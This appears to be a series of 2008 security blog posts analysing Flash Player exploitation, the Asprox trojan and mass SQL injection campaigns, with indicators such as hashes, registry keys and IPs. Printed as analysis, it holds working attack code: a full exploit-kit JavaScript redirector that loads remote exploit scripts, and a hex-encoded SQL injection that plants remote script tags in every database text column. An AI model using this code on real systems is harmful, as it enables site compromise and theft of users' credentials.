"(Default)"=sockins32.dll"ThreadingModel"=Apartment

[HKEY_CLASSES_ROOT\CLSID\{FFFFFFFF-BBBB-4146-86FD-A722E8AB3489}]
"(Default)"=Microsoft copyright

[HKEY_CLASSES_ROOT\CLSID\{FFFFFFFF-BBBB-4146-86FD-A722E8AB3489}\InprocServer32]
"(Default)"=sockins32.dll
"ThreadingModel"=Apartment

[HKEY_CLASSES_ROOT\CLSID\{FFFFFFFF-BBBB-4146-86FD-A722E8AB3489}\ProgID]
"(Default)"=MS

[HKEY_CLASSES_ROOT\CLSID\{FFFFFFFF-BBBB-4146-86FD-A722E8AB3489}\TypeLib]
"(Default)"={0AB9CC99-BBBB-40cb-A718-9A2AF9026DFD}

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{66186F05-BBBB-4a39-864F-72D84615C679}]
"(Default)"=Systray component
"IsInstalled"=1
"Locale"=EN
"StubPath"=rundll32 sockins32.dll,InitModule
"Version"=1,0,0,2

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"WebProxy"={66186F05-BBBB-4a39-864F-72D84615C679}

[HKEY_LOCAL_MACHINE\SOFTWARE\TSoft]
"Ad"=gde*> caftt}vc`~e!~t{?sfu>#?xa
"Ad2"=gde*> txhyene}up{x?f~w`?sfu>#?xa
"MainM"=XDH@BEX OGG
"NN"=m=88
"NUM"=lQQQQQQQQ:UUUU:#&#!:/!QS:V %%R/VU$#/.j

The following files were observed during malware analysis.

1.exe bfbdf69eb3b1c9311bd5bfe4e6da9233 106497
1107833316.exe c048fc3c849151071ddef5fb91e189c4 17203214
instne1.exe c048fc3c849151071ddef5fb91e189c4 172032
1.exe 8679dce8b2cdd441493bc73a8f08e971 92672
971313497.exe 1bdbf846973a29a39fc0e78d1e1597ed 115200
arpaqprq.tmp ac8ff8e2fd73b1fc534a58113eebdbf4 29
CbEvtSvc.exe 327476b3f320d220a71ca59f52725a1c 106496
ccbjq.exe 1bdbf846973a29a39fc0e78d1e1597ed 115200
CcEvtSvc.exe 1bdbf846973a29a39fc0e78d1e1597ed 115200
index.html ca2f1210f73456befb556a52ea1ae089 578
qandr 98f8b44240dd7793f1a8236a146395b4 130048
sft.res af87b7446983df37b85ac04c091824ce 7268
sockins32.dll 849c8247a5673359bfae683e106e277b 32768
video_film.exe 327476b3f320d220a71ca59f52725a1c 106496
_it.bat baa54369f859f810a2f2bd163abef3f0 272

Adobe Flash Player Exploitation

2008-05-28T19:59:00.036-04:00

Several sources including Symantec DeepSight, SANS ISC, and Dancho Danchev have reported in-the-wild exploitation of a vulnerability affecting Adobe Flash Player. The vulnerability was originally thought to be an 0-day, but analysis has revealed it is more likely the previously reported Adobe Flash Player SWF File Unspecified Remote Code Execution Vulnerability (CVE-2007-0071). Adobe Flash Player 9.0.115.0 is affected, and there are conflicting reports whether and to what degree the current version 9.0.124.0 is affected. Initial websites serving Flash exploit code include dota11.cn, wuqing17173.cn, woai117.cn, and play0nlnie.com. Script references to these sites (and a growing number of others) are belived to have been injected into legitimate websites through SQL injection attacks. The malicious sites utilize a Chinese MPack-type tool to generate numerous exploits in an effort to install PSW.OnlineGames trojans designed to exfiltrate gaming credentials. The following provides a sample analysis of wuqing17173.cn.

wuqing17173.cn Analysis:

A Google search for the identified malicious domain wuqing17173.cn (58.215.87.11) currently returns a single result that includes an injected iframe for count18[dot]wuqing17173[dot]cn/click.aspx.php.

The compromised accttstore.com site hosting the count18[dot]wuqing17173[dot]cn iframe deals with selling World of Warcraft (WoW) assets. The aversary end goal is to exfiltrate online gaming credentials, so websites dedicated to WoW are prime targets for injecting iframe and script redirects.

The count18[dot]wuqing17173[dot]cn/click.aspx.php connection returns what looks to be an HTTP 404 error, but the bottom of the page contains malicious JavaScript. The script checks for several ActiveX controls and if present, redirects the victim to specific exploit code hosted at www[dot]0novel[dot]com (58.215.87.11). The following vulnerabilities are attempted to be exploited.

File: Flash.swf, Flash1.swf
Vulnerability: Adobe Flash Player SWF File Unspecified Remote Code Execution Vulnerability
CVE: (BID 28695)

File: ms06014.js
Vulnerability: MDAC RDS.Dataspace ActiveX Control Vulnerability
CVE: CVE-2006-0003

File: Real.js
Vulnerability: RealPlayer IERPCtl ActiveX Playlist Handling Buffer Overflow Vulnerability
CVE: CVE-2007-5601

File: Lz.htm
Vulnerability: Ourgame GLWorld ActiveX Control Multiple Buffer Overflow Vulnerabilities
CVE: CVE-2008-0647

File: Bf.htm
Vulnerability: Baofeng Storm ActiveX Controls Multiple Remote Buffer Overflow Vulnerabilities
CVE: CVE-2007-4816, CVE-2007-4943

File: Xl.htm
Vulnerability: Xunlei Thunder DapPlayer ActiveX Control Buffer Overflow
CVE: CVE-2007-6144

count18[dot]wuqing17173[dot]cn/click.aspx.php code:

<script>window.onerror=function(){return true;}</script>
<Script Language="JScript">
var cook = "silentwm";
function setCookie(name, value, expire)
{
window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
}
function getCookie(Name)
{
var search = Name + "=";
if (window.document.cookie.length > 0)
{
offset = window.document.cookie.indexOf(search);
if (offset != -1)
{
offset += search.length;
end = window.document.cookie.indexOf(";", offset)
if (end == -1)
end = window.document.cookie.length;
return unescape(window.document.cookie.substring(offset, end));
}
}
return null;
}
function register(name)
{
var today = new Date();
var expires = new Date();
expires.setTime(today.getTime() + 1000*60*60*24);
setCookie(cook, name, expires);
}
function openWM()
{
var c = getCookie(cook);
if (c != null)
{
return;
}
register(cook);
window.defaultStatus="....";
try{ var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<script src=http:\/\/www.0novel.com\/ms06014.js><\/script>")}
else
{
var Flashver = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version").split(",");
if(Flashver[2] == 115){document.write('<embed src="flash.swf"></embed>');}
if(Flashver[2] == 47){document.write('<embed src="flash1.swf"></embed>');}
try{ var j;
var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
catch(j){};
finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write('<script src=http:\/\/www.0novel.com\/real.js><\/script>')}
else
{
document.write('<iframe width=10 height=0 src=rl.htm></iframe>')}}}
try{ var g;
var glworld=new ActiveXObject("GLIEDown.IEDown.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src=lz.htm></iframe>')}}
try{ var h;
var storm=new ActiveXObject("MPS.StormPlayer.1");}
catch(h){};
finally{if(h!="[object Error]"){
document.write('<iframe style=display:none src=bf.htm></iframe>')}}
try{ var f;
var thunder=new ActiveXObject("DPClient.Vod");}
catch(f){};
finally{ if(f!="[object Error]"){
document.write('<iframe width=50 height=0 src=xl.htm></iframe>')}}
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]" && j=="[object Error]")
{location.replace("about:blank");}
}}
}
openWM();
</script>
<embed sRc=flash.swf width=50 height=0></embed>

The strings of Flash.swf include the payload http: //www[dot]lovedai[dot]cn/back.css (58.215.87.11) executed as c:\6123t.exe. The payload from the other exploits was www[dot]0novel[dot]com/back.css (58.215.87.11).

Flash.swf strings:

FWS
fHY<
`P3
t.x
urlmon.dll
SSR
;C:\6123t.exe
ahU
http: //www[dot]lovedai[dot]cn/back.css
t.x
C
new_fla MainTimeline
flash.display
MovieClip
new_fla:MainTimeline
frame1
addFrameScript
Object flash.events
EventDispatcher
DisplayObject
InteractiveObject
DisplayObjectContainer
Spritenew_fla.MainTimeline

Malware Analysis:

The malware back.css is a binary file designed to look like a cascading style sheet. The malware creates backow.dll in the victim’s Temp directory and creates and deletes C:\ w1.hiv and C:\w2.hiv. The malware backow.dll is detected as a Infostealer.Gampass variant (Symantec) designed to exfiltrate World of Warcraft (WoW) online gaming accounts.

Filename: back.css
MD5: 54939e5ffb291518a1fb0f28a92faf41
Size: 25.7 KB (26,368 bytes)

Back.css creates:

C:\Documents and Settings\username\Local Settings\Temp\backow.dll

Filename: backow.dll
MD5: 86909167e5b867ea509bd91dba6add03
Size: 14.2 KB (14,592 bytes)

The binary strings of backow.dll reveal WoW domains and the file realmlist.wtf which is a WoW text file that tells the WoW-client which server to connect to.

00003134 00403D34 0 realmlist.wtf
0000317C 00403D7C 0 .worldofwarcraft.com
0000319C 00403D9C 0 .wowchina.com

Back.css creates the following registry keys:

HKEY_CURRENT_USER\Software\ComWaraisn "{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}"
Type: REG_SZ
Data:
HKEY_CURRENT_USER\Software\ComWaraisn "{AEB6717E-7E19-11d0-97EE-00C04FD91972}"
Type: REG_SZ
Data:
HKEY_CLASSES_ROOT\CLSID\{00211E3E-D7A2-456A-AE04-EB9ABF822FE4} "(Default)"
Type: REG_SZ
Data: Windows
HKEY_CLASSES_ROOT\CLSID\{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}\InProcServer32 "(Default)"
Type: REG_SZ
Data: C:\DOCUME~1\username\LOCALS~1\Temp\backow.dll
HKEY_CLASSES_ROOT\CLSID\{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}\InProcServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks "{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}"
Type: REG_SZ
Data:

Asprox Trojan and banner82.com

2008-05-19T23:24:00.012-04:00

On May 19, 2008 Dancho Danchev discussed fast-fluxing SQL injections this time involving the domain banner82.com. The banner82.com SQL injection attacks are similar to the previous direct84.com injections, but there are some slight differences.

SQL Injection Attack:

DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522838303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E62616E6E657238322E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461655F437572736F72 AS
VARCHAR(4000));EXEC(@S);--

Decodes to:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))+''script src=http: //www[dot]banner82[dot]com/b.js script''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Tae_Cursor

The user-agent for the injection was: Mozilla/4.0 (compatible; MSIE 7.0;Windows NT 5.1; .NET CLR 2.0.50727)

Banner82.com Domain
As reported by Danchev, the domain uses fast-flux technology (double-flux) with a rotating pool of proxy peer and DNS IP addresses. A small sample during analysis revealed:

24.126.130.229
67.167.252.180
69.247.201.61
71.81.34.118
74.129.121.181
75.118.8.92
78.92.76.30
89.170.16.252
99.151.145.10
99.254.31.140

Banner82.com Site
The b.js file may redirect to malicious code at a varitiey of locations. A sample analysis revealed the following.

injected script: http: //www[dot]banner82[dot]com/b.js

b.js returned an iframe redirect to: http: //banner82[dot]com/cgi-bin/index.cgi?ad

http: //banner82[dot]com/cgi-bin/index.cgi?ad returned a location redirect to: http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?inbox

http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?inbox returned two layers of obfuscated code (callee.toString() + location.href)

The result is script a redirect to http: //66[dot]199[dot]242.[dot].26 /cgi-bin/index.cgi?ad75d33b00000258007e11f339060000000002e547d1afff02656e2d75730000000000

(the string characters vary with each connection)

Two more layers of obfuscated code (callee.toString() + location.href) reveal Neosploit generated exploit code targeted at the following vulnerabilities:

MDAC RDS.Dataspace ActiveX control vulnerability (CVE-2006-0003)
AOL SB.SuperBuddy.1 ActiveX Control Remote Code Execution Vulnerability (CVE-2006-5820)
GOM Player GOM Manager ActiveX Control Buffer Overflow (CVE-2007-5779)
CA Products DSM ListCtrl ActiveX Control Code Execution Vulnerability (CVE-2008-1472)
Apple Quicktime HREFTrack Cross-Zone Scripting vulnerability (CVE-2007-0059)
Heap-based buffer overflow in DirectAnimation.PathControl COM object (CVE-2006-4446)

The payload was a request for the binary file: http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?ad75d33b00000258027e11f339060000000002e547d1e60002040900000000020

Malware Analysis:
The payload was saved as "index"

Filename: (index.exe) – long string of characters
MD5: 60b9fbb8ba14171cd5d3d1fd86ddd564
Size: 48.0 KB (49,152 bytes)

The malware made the following connection to retrieve common.bin (spam instructions) and cmdexe.bin (SQL injection tool msscntr32.exe)

POST /forum.php HTTP/1.1
Host: 66[dot]199[dot]241[dot]98

POST /forum_asp.php HTTP/1.1
Host: 66[dot]197[dot]168[dot]5

The "index" malware searches for installations of CuteFTP and WS_FTP. The following files were created:

C:\WINDOWS\System32\aspimgr.exe Trojan.Asprox (Symantec)
C:\WINDOWS\s32.txt
C:\WINDOWS\System32\msscntr32.exe

Filename: aspimgr.exe
MD5: bb0c22f33cbf8be8a264e96ef6895ce4
Size: 72.0 KB (73,728 bytes)

Filename: msscntr32.exe
MD5: 30afb898ba27e925f41eab9e68b62833
Size: 20.0 KB (20,480 bytes)

The following registry keys were created:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Sft "(Default)"
Type: REG_SZ
Data: {056B8C51-1B27-4D61-81CA-66EA278842B7}

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "DisplayName"
Type: REG_SZ
Data: Microsoft ASPI Manager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\aspimgr.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_ASPIMGR\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "DisplayName"
Type: REG_SZ
Data: Microsoft Security Center Extension
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\msscntr32.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_MSSCENTER\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00

The malware aspimgr.exe makes the following connections and sets up an HTTP server on port 80.

* Connects to \"ns.uk2.net\" on port 53 (IP)
* Connects to \"www.yahoo.com\" on port 80 (IP)
* Connects to \"www.web.de\" on port 80 (IP)

The Asprox malware generated phishing emails related to "NatWest OnLine Banking"

Asprox Trojan and direct84.com

2008-05-15T15:16:00.010-04:00

On 13 May 2008 SecureWorks posted an article on a SQL-injection attack tool that was being distributed within the Asprox botnet. The tool defaults to injecting a script reference to direct84[dot]com/7.js.

SQL-injection tool:

Filename: msscntr32.exe
MD5: b33be04bff3a9953a46c26dbc853af5c
Size: 17.5 KB (17,920 bytes)

The initial HTTP requests used by the msscntr32.exe attack tool will appear similar to the following:

@S=CAST(0x4400450043004C004100520045002000400054002000760061007200630 0680061007200280032003500350029002C00400043002000760061007200630068006 10072002800320035003500290020004400450043004C00410052004500200www.example.com
The CAST hex decodes to:

DECLARE @T varchar(255),@C varchar(255) DECLARE

The full functionality of the tool is unknown at this time but binary string analysis reveals some potential capabilities. The following relevant strings were observed.

A SQL statement that includes the default injected direct84[dot]com/7.js script.

63006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E00640069007200650063007400380034002E0063006F006D002F0037002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- 4002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E0076006500720074002800760061007200

The CAST hex decodes to:

char,['+@C+']))+'' script src=http ://www[dot].direct84[dot]com/7.js script''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor??????????ì????? FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(var

The binary strings include a Google search that looks for “inurl%:asp inurl%:%s” with 100 results per page and the language setting set to English.

00005178 00405178 0 www.google.com
000051B0 004051B0 0 /search?hl=en&as_epq=&as_oq=&as_eq=&num=100&lr=lang_en&as_filetype=&ft=i&as_sitesearch=&as_qdr=all&as_rights=&as_occt=any&cr=countryUS&as_nlo=&as_nhi=&safe=images&as_q=inurl%%3Aasp+inurl%%3A%s&start=%d

The binary strings include a reference to direct84[dot]com/7.js as well as www[dot]answers.com and youtube.com. It is unknown if these domains are used to test connectivity or for decoy traffic.

00005484 00405484 0 direct84[dot]com/7.js
000054C0 004054C0 0 http://
000054DC 004054DC 0 .asp?
000054F4 004054F4 0 .google.
00005518 00405518 0 www[dot]answers[dot]com
00005554 00405554 0 youtube[dot]com
00005580 00405580 0 cache:

The following user-agent is used by the tool during SQL injection attacks

00005598 00405598 0 Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.25

Several IPs and a reference to s32.txt were visible.

00005A9C 00405A9C 0 s32.txt
00005AC0 00405AC0 0 66.199.241.98
00005ACE 00405ACE 0 82.103.140.75
00005ADC 00405ADC 0 72.21.63.114
00005AE9 00405AE9 0 66.232.102.169
00005AF8 00405AF8 0 66.96.196.53

direct84.com analysis:
The direct84.com domain currently fast-fluxes to several different IPs in the US, Israel and Poland. A short interval included the following round-robin addresses (146.6.143.67, 172.163.165.232, 212.160.151.233, 66.1.4.187, 68.45.135.137, 69.73.111.7, 71.201.175.192, 74.248.14.151, 84.109.131.90, 89.77.235.81)

The direct84.com 7.js script returned an iframe redirect to http: //67[dot]228[dot]13[dot]98/cgi-bin/index.cgi?user1. (This and following redirect paths continually change).

The 67[dot]228[dot]13[dot]98 cgi request returns an iframe redirect to http: //216[dot]32[dot]85[dot]234/index.php

The index.php returned 3 exploits:
Microsoft DirectX Media 6.0 Live Picture Corporation DirectTransform FlashPix ActiveX control buffer overflow (CVE-2007-4336)
Apple QuickTime RTSP Content-Type header stack buffer overflow (CVE-2007-6166)
MDAC RDS.Dataspace ActiveX control vulnerability (CVE-2006-0003)

The payload is http: //216[dot]32[dot]85[dot]234/load.php?MSIE downloaded as ldr.exe.

malware analysis:
The malware ldr.exe is detected as Trojan.Asprox (Symantec)

Filename: ldr.exe
MD5: f27dc661f7b51dd76adfb2d371b888e8
Size: 48640

The following files are created:

C:\WINDOWS\db32.txt.
C:\WINDOWS\system32\aspimgr.exe.
C:\WINDOWS\ws386.ini.
C:\WINDOWS\s32.txt.

The following file is deleted:

C:\WINDOWS\db32.txt

The following registry keys are created to install aspimgr.exe as a service.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "DisplayName"
Type: REG_SZ
Data: Microsoft ASPI Manager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\aspimgr.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_ASPIMGR\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Sft "(Default)"
Type: REG_SZ
Data: {4C7783CA-076B-4313-BBF1-21FB818E7701}

The malware aspimgr.exe makes the following connections and sets up an HTTP server on port 80.

* Connects to \"ns.uk2.net\" on port 53 (IP).
* Connects to \"www.yahoo.com\" on port 80 (IP).
* Connects to \"www.web.de\" on port 80 (IP).
* Connects to \"FAKE\" on port 4660 (IP).

The malware aspimgr.exe initiates a POST connection to http: //66[dot]232[dot]102[dot]169/forum.php. The connection passes system and trojan characteristics and a binary file common.bin is returned which contains trojan spamming instructions to include IP addresses, email addresses, SMTP commands, and spam email content. Common.bin can be decoded by XORing each byte with 27 (hex 0x1B) as previously referenced at SANS.

A sample decoded common.bin file:

98.200.11.115567.161.226.835129.59.138.199568.45.135.137584.109.131.90568.249.106.122524.126.130.229598.208.97.485<5_n>70.231.150.1615209.74.208.75589.78.235.81584.10.100.196575.137.93.12586.16.211.245566.233.229.99574.60.224.365<5_m>74.50.120.15055/customerup5ate5/confirm.aspx5/in5ex.php5/55/5etails.aspx5/94.js5/servlet5/profile5/ecar5s5/7.js5/olb5/custform5524.74.176.23755akronchablis@gar5ener.com55akroncha5@earthlink.net55akroncha5@technologist.com55akroncha55@unite5layer.com55akroncha5wick@royalgar5ensupplies.com55akronchaff@rrfabrications.com55akronchagrin@hair5resser.net55akronchain@clerk.com55akronchain@5iplomats.
[truncated]
Message-ID: <%%MSGID%%>55From: %%FROM%%55To: <%%RCPT%%>55Subject: %%SUBJ%%55Date: %%DATE%%55MIME-Version: 1.055Content-Type: multipart/alternative;555boun5ary="%%BND:1%%"55X-Priority: 355X-MSMail-Priority: Normal55X-Mailer: Microsoft Outlook Express 6.00.2900.218055X-MimeOLE: Pro5uce5 By Microsoft MimeOLE V6.00.2900.21805555This is a multi-part message in MIME format.5555--%%BND:1%%55Content-Type: text/plain;555charset="iso-8859-1"55Content-Transfer-Enco5ing: quote5-printable5555 Get popular cheap Soft right now!5 Absolutely all OF OUR OEMS ARE AVAILABLE ON EVERY EUROPEAN LANGUAGES -5 English, French, Italian, Spanish, German an5 any others..55 Win5ows Vista Ultimate - $71.065 Win5ows XP Pro With SP2 - $57.555 Office Enterprise 2007 - $72.015
[truncated]
helo5555<11300000resolve55<11301010ptr55<11300010reverse55<11301010fqdn55<113000115nserror55<113000115nsinvali555<113000115nsfail55<113000115nslookup55
[truncated]

Spamming must pay well...

nihaorr1.com SQL Injection

2008-05-15T13:18:00.012-04:00

nihaorr1.com has been used in SQL injection attacks since at least April 2008. The domain was also the source of the automated Chinese CLI/SQL injection tool posted at SANS.

SQL injection attack:

Injected SQL Statement:
